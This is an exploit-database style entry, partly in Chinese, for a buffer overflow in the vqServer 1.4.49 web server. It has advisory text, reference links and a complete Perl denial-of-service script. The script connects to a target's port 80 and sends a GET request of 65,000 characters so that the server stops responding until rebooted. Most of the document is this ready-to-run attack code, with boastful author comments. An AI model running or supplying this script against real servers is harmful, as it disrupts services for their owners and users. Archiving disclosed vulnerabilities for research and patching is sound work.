https://www.exploit-db.com/exploits/20178
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-028

vqServer是一个小型的Web服务器程序，运行于MicrosoftWindows系统下。vqServer1.4.49实现上存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。远程攻击者如果给服务器发送长达65000个字节的”GET”请求，服务器将会停止响应。必需重启才能恢复提供正常服务。

source: http://www.securityfocus.com/bid/1610/info

vqServer 1.4.49 is subject to a buffer overflow. If a GET request is sent to the server containing 65 000 characters the server will stop responding. A reboot is required in order to gain normal functionality.


#!/usr/bin/perl 
# DoS exploit for vqServer 1.4.49 
# This vulnerability was discovered by nemesystm 
# ([email protected])
#
# code by: sinfony    ([email protected]) 
# [confess.sins.labs] (http://www.ro0t.nu/csl) 
# and DHC member	    
#
# kiddie quote of the year:
# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it 

die "vqServer 1.4.49 DoS by sinfony ([email protected])n
usage: $0 <host> n" 
if $#ARGV != 0; 

use IO::Socket;

$host = $ARGV[0];
$port = 80;

print "Connecting to $host on port $port...n"; 
$suck = IO::Socket::INET->
	new(Proto=>"tcp", 
	PeerAddr=>$host,
	PeerPort=>$port)
	|| die "$host isnt a webserver you schmuck.n"; 

$a = A;
$send = $a x 65000;
	print "Connected, sending exploit.n";
	print $suck "GET /$sendn"; 
sleep(3); 
	print "Exploit sent. vqServer should be dead.n";
close($suck)

来源:BID
名称:1610
链接:http://www.securityfocus.com/bid/1610
来源:BUGTRAQ
名称:20000819D.o.SVulnerabilityinvqServer
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:XF
名称:vqserver-get-dos
链接:http://xforce.iss.net/static/5152.php
来源：NSFOCUS
名称：790
链接：http://www.nsfocus.net/vulndb/790